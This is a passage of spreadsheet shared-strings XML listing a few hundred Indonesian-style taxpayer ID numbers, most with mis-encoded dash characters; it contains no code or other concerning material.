    <t>76‚Äì995‚Äì281‚Äì3‚Äì727‚Äì000</t>
  </si>
  <si>
    <t>07‚Äì850‚Äì567‚Äì4‚Äì603‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì312‚Äì129‚Äì6‚Äì052‚Äì000</t>
  </si>
  <si>
    <t>02.629.276.3-415.000</t>
  </si>
  <si>
    <t>31‚Äì185‚Äì596‚Äì8‚Äì733‚Äì000</t>
  </si>
  <si>
    <t>21‚Äì104‚Äì604‚Äì0‚Äì416‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì477‚Äì156‚Äì0‚Äì311‚Äì000</t>
  </si>
  <si>
    <t>07‚Äì356‚Äì884‚Äì2‚Äì311‚Äì000</t>
  </si>
  <si>
    <t>82‚Äì632‚Äì962‚Äì5‚Äì115‚Äì000</t>
  </si>
  <si>
    <t>14‚Äì158‚Äì963‚Äì0‚Äì115‚Äì000</t>
  </si>
  <si>
    <t>71‚Äì585‚Äì202‚Äì6‚Äì125‚Äì000</t>
  </si>
  <si>
    <t>09‚Äì212‚Äì339‚Äì7‚Äì403‚Äì000</t>
  </si>
  <si>
    <t>85‚Äì226‚Äì600‚Äì6‚Äì507‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì309‚Äì254‚Äì9‚Äì431‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì528‚Äì651‚Äì1‚Äì415‚Äì000</t>
  </si>
  <si>
    <t>71‚Äì420‚Äì229‚Äì8‚Äì121‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì735‚Äì628‚Äì8‚Äì801‚Äì000</t>
  </si>
  <si>
    <t>83‚Äì286‚Äì893‚Äì9‚Äì402‚Äì000</t>
  </si>
  <si>
    <t>86‚Äì016‚Äì835‚Äì0‚Äì809‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì061‚Äì076‚Äì4‚Äì645‚Äì001</t>
  </si>
  <si>
    <t>75‚Äì380‚Äì853‚Äì4‚Äì643‚Äì000</t>
  </si>
  <si>
    <t>71‚Äì715‚Äì857‚Äì0‚Äì112‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì287‚Äì264‚Äì0‚Äì801‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì061‚Äì076‚Äì4‚Äì214‚Äì001</t>
  </si>
  <si>
    <t>21‚Äì010‚Äì764‚Äì5‚Äì041‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì216‚Äì939‚Äì3‚Äì805‚Äì000</t>
  </si>
  <si>
    <t>73‚Äì728‚Äì366‚Äì3‚Äì655‚Äì000</t>
  </si>
  <si>
    <t>99‚Äì991‚Äì929‚Äì2‚Äì929‚Äì299</t>
  </si>
  <si>
    <t>82‚Äì281‚Äì005‚Äì7‚Äì101‚Äì000</t>
  </si>
  <si>
    <t>12‚Äì345‚Äì678‚Äì9‚Äì101‚Äì112</t>
  </si>
  <si>
    <t>01‚Äì670‚Äì199‚Äì7‚Äì057‚Äì000</t>
  </si>
  <si>
    <t>31‚Äì523‚Äì512‚Äì7‚Äì418‚Äì000</t>
  </si>
  <si>
    <t>31‚Äì539‚Äì199‚Äì5‚Äì416‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì710‚Äì662‚Äì4‚Äì213‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì328‚Äì912‚Äì5‚Äì831‚Äì000</t>
  </si>
  <si>
    <t>09‚Äì600‚Äì276‚Äì1‚Äì331‚Äì000</t>
  </si>
  <si>
    <t>72‚Äì834‚Äì020‚Äì9‚Äì701‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì833‚Äì008‚Äì4‚Äì804‚Äì000</t>
  </si>
  <si>
    <t>82‚Äì113‚Äì724‚Äì7‚Äì047‚Äì000</t>
  </si>
  <si>
    <t>31‚Äì666‚Äì592‚Äì8‚Äì615‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì534‚Äì679‚Äì2‚Äì017‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì652‚Äì243‚Äì3‚Äì723‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì264‚Äì503‚Äì8‚Äì823‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì193‚Äì034‚Äì2‚Äì057‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì602‚Äì597‚Äì3‚Äì432‚Äì000</t>
  </si>
  <si>
    <t>78‚Äì995‚Äì840‚Äì2‚Äì617‚Äì000</t>
  </si>
  <si>
    <t>24‚Äì431‚Äì761‚Äì6‚Äì643‚Äì000</t>
  </si>
  <si>
    <t>66‚Äì719‚Äì533‚Äì3‚Äì801‚Äì000</t>
  </si>
  <si>
    <t>31‚Äì808‚Äì100‚Äì7‚Äì451‚Äì000</t>
  </si>
  <si>
    <t>84‚Äì977‚Äì214‚Äì0‚Äì809‚Äì000</t>
  </si>
  <si>
    <t>81‚Äì291‚Äì835‚Äì7‚Äì112‚Äì000</t>
  </si>
  <si>
    <t>01.061.797.5-058.000</t>
  </si>
  <si>
    <t>31‚Äì153‚Äì639‚Äì5‚Äì402‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì032‚Äì738‚Äì3‚Äì812‚Äì000</t>
  </si>
  <si>
    <t>80‚Äì494‚Äì397‚Äì5‚Äì625‚Äì000</t>
  </si>
  <si>
    <t>72‚Äì892‚Äì260‚Äì0‚Äì809‚Äì001</t>
  </si>
  <si>
    <t>01‚Äì061‚Äì864‚Äì3‚Äì057‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì442‚Äì448‚Äì3‚Äì941‚Äì000</t>
  </si>
  <si>
    <t>81‚Äì029‚Äì586‚Äì5‚Äì822‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì568‚Äì084‚Äì6‚Äì605‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì002‚Äì081‚Äì6‚Äì052‚Äì000</t>
  </si>
  <si>
    <t>73‚Äì340‚Äì207‚Äì0‚Äì410‚Äì000</t>
  </si>
  <si>
    <t>74‚Äì832‚Äì846‚Äì5‚Äì643‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì409‚Äì482‚Äì5‚Äì617‚Äì001</t>
  </si>
  <si>
    <t>02‚Äì343‚Äì781‚Äì7‚Äì702‚Äì000</t>
  </si>
  <si>
    <t>80‚Äì303‚Äì451‚Äì1‚Äì325‚Äì000</t>
  </si>
  <si>
    <t>74‚Äì040‚Äì809‚Äì1‚Äì823‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì990‚Äì100‚Äì8‚Äì903‚Äì000</t>
  </si>
  <si>
    <t>85‚Äì381‚Äì638‚Äì7‚Äì701‚Äì000</t>
  </si>
  <si>
    <t>66‚Äì822‚Äì862‚Äì0‚Äì402‚Äì000</t>
  </si>
  <si>
    <t>73‚Äì304‚Äì500‚Äì9‚Äì402‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì825‚Äì856‚Äì4‚Äì615‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì013‚Äì004‚Äì3‚Äì801‚Äì000</t>
  </si>
  <si>
    <t>71‚Äì542‚Äì510‚Äì7‚Äì008‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì644‚Äì559‚Äì5‚Äì059‚Äì000</t>
  </si>
  <si>
    <t>85‚Äì332‚Äì013‚Äì3‚Äì951‚Äì000</t>
  </si>
  <si>
    <t>06.548.860.3‚Äì951.000</t>
  </si>
  <si>
    <t>84‚Äì423‚Äì065‚Äì6‚Äì503‚Äì000</t>
  </si>
  <si>
    <t>81‚Äì733‚Äì564‚Äì9‚Äì041‚Äì000</t>
  </si>
  <si>
    <t>73‚Äì468‚Äì724‚Äì7‚Äì951‚Äì000</t>
  </si>
  <si>
    <t>86‚Äì941‚Äì356‚Äì7‚Äì503‚Äì000</t>
  </si>
  <si>
    <t>80‚Äì386‚Äì579‚Äì9‚Äì047‚Äì000</t>
  </si>
  <si>
    <t>72‚Äì970‚Äì946‚Äì9‚Äì941‚Äì000</t>
  </si>
  <si>
    <t>66‚Äì719‚Äì533‚Äì3‚Äì807‚Äì001</t>
  </si>
  <si>
    <t>02‚Äì069‚Äì816‚Äì3‚Äì511‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì919‚Äì811‚Äì6‚Äì823‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì330‚Äì420‚Äì9‚Äì019‚Äì000</t>
  </si>
  <si>
    <t>83‚Äì389‚Äì722‚Äì6‚Äì047‚Äì000</t>
  </si>
  <si>
    <t>57‚Äì401‚Äì027‚Äì8‚Äì627‚Äì000</t>
  </si>
  <si>
    <t>83‚Äì353‚Äì333‚Äì4‚Äì906‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì876‚Äì267‚Äì4‚Äì801‚Äì000</t>
  </si>
  <si>
    <t>36‚Äì924‚Äì044‚Äì5‚Äì901‚Äì000</t>
  </si>
  <si>
    <t>84‚Äì436‚Äì106‚Äì3‚Äì941‚Äì000</t>
  </si>
  <si>
    <t>91‚Äì320‚Äì727‚Äì0‚Äì101‚Äì000</t>
  </si>
  <si>
    <t>73‚Äì405‚Äì403‚Äì7‚Äì625‚Äì000</t>
  </si>
  <si>
    <t>86-108-966-2-603-000</t>
  </si>
  <si>
    <t>31‚Äì706‚Äì571‚Äì2‚Äì941‚Äì000</t>
  </si>
  <si>
    <t>06‚Äì909‚Äì714‚Äì5‚Äì311‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì259‚Äì697‚Äì7‚Äì126‚Äì000</t>
  </si>
  <si>
    <t>75‚Äì555‚Äì151‚Äì3‚Äì335‚Äì000</t>
  </si>
  <si>
    <t>73‚Äì371‚Äì539‚Äì5‚Äì402‚Äì000</t>
  </si>
  <si>
    <t>83‚Äì908‚Äì126‚Äì2‚Äì453‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì040‚Äì929‚Äì6‚Äì041‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì919‚Äì664‚Äì9‚Äì823‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì129‚Äì154‚Äì5‚Äì801‚Äì000</t>
  </si>
  <si>
    <t>85‚Äì538‚Äì184‚Äì4‚Äì503‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì233‚Äì310‚Äì0‚Äì643‚Äì001</t>
  </si>
  <si>
    <t>01‚Äì278‚Äì337‚Äì9‚Äì655‚Äì001</t>
  </si>
  <si>
    <t>71‚Äì003‚Äì722‚Äì7‚Äì041‚Äì000</t>
  </si>
  <si>
    <t>21‚Äì118‚Äì829‚Äì7‚Äì047‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì218‚Äì352‚Äì5‚Äì801‚Äì003</t>
  </si>
  <si>
    <t>16‚Äì286‚Äì465‚Äì6‚Äì203‚Äì000</t>
  </si>
  <si>
    <t>80‚Äì474‚Äì359‚Äì9‚Äì225‚Äì000</t>
  </si>
  <si>
    <t>70‚Äì242‚Äì516‚Äì6‚Äì215‚Äì000</t>
  </si>
  <si>
    <t>84‚Äì885‚Äì768‚Äì6‚Äì026‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì046‚Äì906‚Äì0‚Äì903‚Äì000</t>
  </si>
  <si>
    <t>85‚Äì181‚Äì392‚Äì3‚Äì215‚Äì000</t>
  </si>
  <si>
    <t>45‚Äì969‚Äì644‚Äì9‚Äì017‚Äì000</t>
  </si>
  <si>
    <t>74‚Äì836‚Äì650‚Äì7‚Äì307‚Äì000</t>
  </si>
  <si>
    <t>84‚Äì333‚Äì009‚Äì3‚Äì201‚Äì000</t>
  </si>
  <si>
    <t>31‚Äì547‚Äì678‚Äì8‚Äì402‚Äì000</t>
  </si>
  <si>
    <t>80‚Äì457‚Äì569‚Äì4‚Äì124‚Äì000</t>
  </si>
  <si>
    <t>06‚Äì851‚Äì900‚Äì8‚Äì951‚Äì000</t>
  </si>
  <si>
    <t>85‚Äì597‚Äì555‚Äì3‚Äì402‚Äì000</t>
  </si>
  <si>
    <t>81‚Äì991‚Äì686‚Äì7‚Äì409‚Äì000</t>
  </si>
  <si>
    <t>81‚Äì859‚Äì949‚Äì0‚Äì047‚Äì000</t>
  </si>
  <si>
    <t>21‚Äì010‚Äì768‚Äì6‚Äì126‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì047‚Äì598‚Äì2‚Äì805‚Äì001</t>
  </si>
  <si>
    <t>01‚Äì891‚Äì866‚Äì4‚Äì041‚Äì000</t>
  </si>
  <si>
    <t>14.889.932.1-223.000</t>
  </si>
  <si>
    <t>76‚Äì679‚Äì420‚Äì0‚Äì223‚Äì000</t>
  </si>
  <si>
    <t>75.885.204.0-212.000</t>
  </si>
  <si>
    <t>86‚Äì237‚Äì592‚Äì0‚Äì214‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì754‚Äì336‚Äì2‚Äì901‚Äì000</t>
  </si>
  <si>
    <t>80‚Äì238‚Äì755‚Äì5‚Äì721‚Äì000</t>
  </si>
  <si>
    <t>84‚Äì040‚Äì418‚Äì0‚Äì622‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì704‚Äì079‚Äì1‚Äì503‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì275‚Äì077‚Äì2‚Äì059‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì312‚Äì174‚Äì4‚Äì062‚Äì000</t>
  </si>
  <si>
    <t>85‚Äì689‚Äì102‚Äì3‚Äì402‚Äì000</t>
  </si>
  <si>
    <t>75‚Äì710‚Äì521‚Äì8‚Äì801‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì620‚Äì906‚Äì6‚Äì054‚Äì000</t>
  </si>
  <si>
    <t>84‚Äì844‚Äì897‚Äì3‚Äì048‚Äì000</t>
  </si>
  <si>
    <t>07‚Äì703‚Äì829‚Äì7‚Äì804‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì951‚Äì411‚Äì6‚Äì057‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì526‚Äì655‚Äì4‚Äì614‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì299‚Äì921‚Äì1‚Äì801‚Äì000</t>
  </si>
  <si>
    <t>81‚Äì107‚Äì406‚Äì1‚Äì627‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì817‚Äì442‚Äì3‚Äì613‚Äì000</t>
  </si>
  <si>
    <t>36‚Äì398‚Äì172‚Äì1‚Äì702‚Äì000</t>
  </si>
  <si>
    <t>47‚Äì827‚Äì652‚Äì0‚Äì621‚Äì000</t>
  </si>
  <si>
    <t>14‚Äì454‚Äì239‚Äì6‚Äì224‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì368‚Äì275‚Äì2‚Äì092‚Äì000</t>
  </si>
  <si>
    <t>85‚Äì712‚Äì942‚Äì3‚Äì311‚Äì000</t>
  </si>
  <si>
    <t>86‚Äì470‚Äì202‚Äì2‚Äì807‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì140‚Äì938‚Äì0‚Äì641‚Äì001</t>
  </si>
  <si>
    <t>85‚Äì765‚Äì423‚Äì0‚Äì801‚Äì000</t>
  </si>
  <si>
    <t>82‚Äì423‚Äì525‚Äì3‚Äì723‚Äì000</t>
  </si>
  <si>
    <t>31‚Äì671‚Äì806‚Äì3‚Äì723‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì715‚Äì234‚Äì9‚Äì801‚Äì000</t>
  </si>
  <si>
    <t>04‚Äì212‚Äì171‚Äì5‚Äì617‚Äì000</t>
  </si>
  <si>
    <t>73‚Äì589‚Äì267‚Äì1‚Äì071‚Äì000</t>
  </si>
  <si>
    <t>73‚Äì357‚Äì927‚Äì0‚Äì224‚Äì000</t>
  </si>
  <si>
    <t>14‚Äì029‚Äì153‚Äì5‚Äì224‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì043‚Äì969‚Äì1‚Äì505‚Äì000</t>
  </si>
  <si>
    <t>14‚Äì454‚Äì273‚Äì5‚Äì224‚Äì000</t>
  </si>
  <si>
    <t>84‚Äì493‚Äì555‚Äì1‚Äì507‚Äì000</t>
  </si>
  <si>
    <t>70‚Äì466‚Äì044‚Äì8‚Äì036‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì425‚Äì024‚Äì5‚Äì604‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì155‚Äì253‚Äì4‚Äì411‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì000‚Äì065‚Äì1‚Äì613‚Äì001</t>
  </si>
  <si>
    <t>31‚Äì297‚Äì674‚Äì9‚Äì517‚Äì000</t>
  </si>
  <si>
    <t>70‚Äì223‚Äì081‚Äì4‚Äì913‚Äì000</t>
  </si>
  <si>
    <t>72‚Äì350‚Äì278‚Äì7‚Äì212‚Äì000</t>
  </si>
  <si>
    <t>15‚Äì037‚Äì223‚Äì3‚Äì215‚Äì000</t>
  </si>
  <si>
    <t>85‚Äì961‚Äì947‚Äì0‚Äì101‚Äì000</t>
  </si>
  <si>
    <t>82‚Äì444‚Äì430‚Äì1‚Äì212‚Äì000</t>
  </si>
  <si>
    <t>80‚Äì798‚Äì678‚Äì1‚Äì042‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì125‚Äì121‚Äì0‚Äì415‚Äì000</t>
  </si>
  <si>
    <t>82‚Äì308‚Äì062‚Äì7‚Äì451‚Äì000</t>
  </si>
  <si>
    <t>14‚Äì782‚Äì078‚Äì1‚Äì821‚Äì000</t>
  </si>
  <si>
    <t>21‚Äì014‚Äì753‚Äì4‚Äì013‚Äì000</t>
  </si>
  <si>
    <t>84‚Äì039‚Äì461‚Äì3‚Äì047‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì452‚Äì823‚Äì6‚Äì124‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì501‚Äì399‚Äì8‚Äì122‚Äì000</t>
  </si>
  <si>
    <t>04‚Äì020‚Äì896‚Äì9‚Äì617‚Äì000</t>
  </si>
  <si>
    <t>77‚Äì496‚Äì885‚Äì3‚Äì648‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì871‚Äì297‚Äì6‚Äì426‚Äì001</t>
  </si>
  <si>
    <t>01‚Äì770‚Äì659‚Äì9‚Äì048‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì469‚Äì876‚Äì3‚Äì805‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì484‚Äì575‚Äì4‚Äì812‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì164‚Äì480‚Äì2‚Äì812‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì235‚Äì216‚Äì7‚Äì601‚Äì000</t>
  </si>
  <si>
    <t>07‚Äì865‚Äì248‚Äì4‚Äì604‚Äì001</t>
  </si>
  <si>
    <t>01‚Äì235‚Äì216‚Äì7‚Äì627‚Äì001</t>
  </si>
  <si>
    <t>86‚Äì827‚Äì785‚Äì6‚Äì823‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì823‚Äì769‚Äì1‚Äì507‚Äì001</t>
  </si>
  <si>
    <t>01‚Äì002‚Äì145‚Äì9‚Äì014‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì000‚Äì532‚Äì0‚Äì014‚Äì000</t>
  </si>
  <si>
    <t>81‚Äì452‚Äì741‚Äì2‚Äì034‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì115‚Äì861‚Äì3‚Äì513‚Äì000</t>
  </si>
  <si>
    <t>71‚Äì558‚Äì666‚Äì5‚Äì426‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì101‚Äì053‚Äì5‚Äì812‚Äì000</t>
  </si>
  <si>
    <t>06‚Äì263‚Äì317‚Äì7‚Äì617‚Äì000</t>
  </si>
  <si>
    <t>01.829.759.8-627.000</t>
  </si>
  <si>
    <t>91‚Äì307‚Äì807‚Äì7‚Äì915‚Äì000</t>
  </si>
  <si>
    <t>83‚Äì235‚Äì227‚Äì2‚Äì604‚Äì000</t>
  </si>
  <si>
    <t>80‚Äì513‚Äì991‚Äì2‚Äì224‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì076‚Äì801‚Äì6‚Äì046‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì880‚Äì300‚Äì7‚Äì112‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì060‚Äì590‚Äì1‚Äì112‚Äì000</t>
  </si>
  <si>
    <t>66‚Äì989‚Äì776‚Äì1‚Äì656‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì941‚Äì600‚Äì7‚Äì614‚Äì000</t>
  </si>
  <si>
    <t>81‚Äì227‚Äì041‚Äì1‚Äì017‚Äì000</t>
  </si>
  <si>
    <t>02.296.549.5-041.000</t>
  </si>
  <si>
    <t>03‚Äì025‚Äì137‚Äì5‚Äì643‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì948‚Äì500‚Äì0‚Äì507‚Äì000</t>
  </si>
  <si>
    <t>86‚Äì125‚Äì979‚Äì4‚Äì047‚Äì000</t>
  </si>
  <si>
    <t>72‚Äì772‚Äì986‚Äì5‚Äì806‚Äì000</t>
  </si>
  <si>
    <t>16‚Äì827‚Äì101‚Äì3‚Äì822‚Äì000</t>
  </si>
  <si>
    <t>73‚Äì072‚Äì621‚Äì3‚Äì627‚Äì000</t>
  </si>
  <si>
    <t>71‚Äì151‚Äì250‚Äì9‚Äì402‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì800‚Äì347‚Äì3‚Äì641‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì682‚Äì022‚Äì5‚Äì047‚Äì000</t>
  </si>
  <si>
    <t>85‚Äì377‚Äì157‚Äì4‚Äì017‚Äì000</t>
  </si>
  <si>
    <t>83‚Äì325‚Äì763‚Äì7‚Äì625‚Äì001</t>
  </si>
  <si>
    <t>86‚Äì761‚Äì064‚Äì4‚Äì047‚Äì000</t>
  </si>
  <si>
    <t>84‚Äì154‚Äì890‚Äì2‚Äì821‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì714‚Äì291‚Äì8‚Äì612‚Äì000</t>
  </si>
  <si>
    <t>71.028.111.4-501.000</t>
  </si>
  <si>
    <t>70‚Äì117‚Äì302‚Äì3‚Äì301‚Äì000</t>
  </si>
  <si>
    <t>77‚Äì078‚Äì727‚Äì3‚Äì213‚Äì000</t>
  </si>
  <si>
    <t>75‚Äì979‚Äì061‚Äì1‚Äì213‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì561‚Äì150‚Äì0‚Äì641‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì129‚Äì279‚Äì0‚Äì801‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì458‚Äì697‚Äì8‚Äì821‚Äì000</t>
  </si>
  <si>
    <t>83‚Äì467‚Äì637‚Äì1‚Äì503‚Äì000</t>
  </si>
  <si>
    <t>86‚Äì338‚Äì885‚Äì6‚Äì643‚Äì000</t>
  </si>
  <si>
    <t>31‚Äì280‚Äì264‚Äì8‚Äì805‚Äì001</t>
  </si>
  <si>
    <t>02‚Äì005‚Äì455‚Äì7‚Äì823‚Äì001</t>
  </si>
  <si>
    <t>02‚Äì483‚Äì865‚Äì8‚Äì214‚Äì000</t>
  </si>
  <si>
    <t>86‚Äì956‚Äì896‚Äì4‚Äì224‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì083‚Äì032‚Äì1‚Äì631‚Äì000</t>
  </si>
  <si>
    <t>84‚Äì596‚Äì107‚Äì7‚Äì124‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì319‚Äì369‚Äì9‚Äì086‚Äì000</t>
  </si>
  <si>
    <t>16‚Äì778‚Äì987‚Äì4‚Äì315‚Äì000</t>
  </si>
  <si>
    <t>86‚Äì234‚Äì067‚Äì6‚Äì727‚Äì000</t>
  </si>
  <si>
    <t>90‚Äì087‚Äì412‚Äì4‚Äì801‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì831‚Äì077‚Äì9‚Äì014‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì100‚Äì476‚Äì9‚Äì041‚Äì001</t>
  </si>
  <si>
    <t>76‚Äì331‚Äì536‚Äì3‚Äì112‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì851‚Äì463‚Äì6‚Äì224‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì051‚Äì668‚Äì6‚Äì801‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì938‚Äì499‚Äì7‚Äì603‚Äì000</t>
  </si>
  <si>
    <t>85‚Äì183‚Äì011‚Äì7‚Äì951‚Äì000</t>
  </si>
  <si>
    <t>77‚Äì517‚Äì092‚Äì1‚Äì404‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì255‚Äì688‚Äì0‚Äì645‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì425‚Äì188‚Äì8‚Äì609‚Äì000</t>
  </si>
  <si>
    <t>49‚Äì741‚Äì176‚Äì9‚Äì911‚Äì000</t>
  </si>
  <si>
    <t>06‚Äì098‚Äì063‚Äì8‚Äì213‚Äì000</t>
  </si>
  <si>
    <t>84‚Äì856‚Äì148‚Äì6‚Äì617‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì175‚Äì328‚Äì8‚Äì727‚Äì000</t>
  </si>
  <si>
    <t>06‚Äì000‚Äì406‚Äì6‚Äì113‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì686‚Äì270‚Äì8‚Äì044‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì817‚Äì282‚Äì3‚Äì613‚Äì000</t>
  </si>
  <si>
    <t>74‚Äì244‚Äì720‚Äì4‚Äì507‚Äì001</t>
  </si>
  <si>
    <t>82‚Äì714‚Äì616‚Äì8‚Äì026‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì744‚Äì272‚Äì4‚Äì046‚Äì000</t>
  </si>
  <si>
    <t>04‚Äì021‚Äì168‚Äì2‚Äì617‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì546‚Äì089‚Äì2‚Äì643‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì968‚Äì292‚Äì9‚Äì034‚Äì000</t>
  </si>
  <si>
    <t>25‚Äì913‚Äì362‚Äì7‚Äì513‚Äì000</t>
  </si>
  <si>
    <t>01.592.618.1-801.001</t>
  </si>
  <si>
    <t>72‚Äì072‚Äì170‚Äì3‚Äì618‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì100‚Äì476‚Äì9‚Äì112‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì051‚Äì630‚Äì8‚Äì812‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì385‚Äì382‚Äì3‚Äì805‚Äì000</t>
  </si>
  <si>
    <t>06‚Äì481‚Äì279‚Äì5‚Äì623‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì889‚Äì386‚Äì5‚Äì126‚Äì000</t>
  </si>
  <si>
    <t>54‚Äì349‚Äì780‚Äì4‚Äì824‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì040‚Äì306‚Äì7‚Äì041‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì772‚Äì284‚Äì4‚Äì038‚Äì000</t>
  </si>
  <si>
    <t>97‚Äì321‚Äì505‚Äì6‚Äì036‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì001‚Äì671‚Äì5‚Äì601‚Äì001</t>
  </si>
  <si>
    <t>84‚Äì101‚Äì983‚Äì9‚Äì612‚Äì000</t>
  </si>
  <si>
    <t>80‚Äì514‚Äì781‚Äì6‚Äì447‚Äì000</t>
  </si>
  <si>
    <t>90‚Äì359‚Äì438‚Äì0‚Äì822‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì592‚Äì149‚Äì7‚Äì801‚Äì001</t>
  </si>
  <si>
    <t>04‚Äì121‚Äì903‚Äì1‚Äì426‚Äì000</t>
  </si>
  <si>
    <t>84‚Äì189‚Äì904‚Äì0‚Äì225‚Äì000</t>
  </si>
  <si>
    <t>72‚Äì560‚Äì647‚Äì9‚Äì627‚Äì000</t>
  </si>
  <si>
    <t>14‚Äì180‚Äì399‚Äì9‚Äì643‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì259‚Äì755‚Äì1‚Äì941‚Äì000</t>
  </si>
  <si>
    <t>73‚Äì801‚Äì600‚Äì5‚Äì648‚Äì000</t>
  </si>
  <si>
    <t>16‚Äì815‚Äì506‚Äì7‚Äì821‚Äì000</t>
  </si>
  <si>
    <t>83‚Äì044‚Äì995‚Äì5‚Äì047‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì412‚Äì254‚Äì3‚Äì812‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì557‚Äì692‚Äì7‚Äì801‚Äì000</t>
  </si>
  <si>
    <t>80‚Äì141‚Äì759‚Äì3‚Äì905‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì777‚Äì129‚Äì6‚Äì904‚Äì000</t>
  </si>
  <si>
    <t>31‚Äì218‚Äì606‚Äì7‚Äì903‚Äì000</t>
  </si>
  <si>
    <t>84‚Äì197‚Äì287‚Äì0‚Äì912‚Äì000</t>
  </si>
  <si>
    <t>70‚Äì594‚Äì656‚Äì4‚Äì034‚Äì000</t>
  </si>
  <si>
    <t>85‚Äì488‚Äì117‚Äì4‚Äì724‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì824‚Äì589‚Äì4‚Äì059‚Äì000</t>
  </si>
  <si>
    <t>31‚Äì238‚Äì954‚Äì7‚Äì432‚Äì000</t>
  </si>
  <si>
    <t>07‚Äì091‚Äì904‚Äì8‚Äì518‚Äì000</t>
  </si>
  <si>
    <t>59‚Äì848‚Äì676‚Äì9‚Äì911‚Äì001</t>
  </si>
  <si>
    <t>01‚Äì567‚Äì141‚Äì0‚Äì821‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì537‚Äì427‚Äì5‚Äì823‚Äì000</t>
  </si>
  <si>
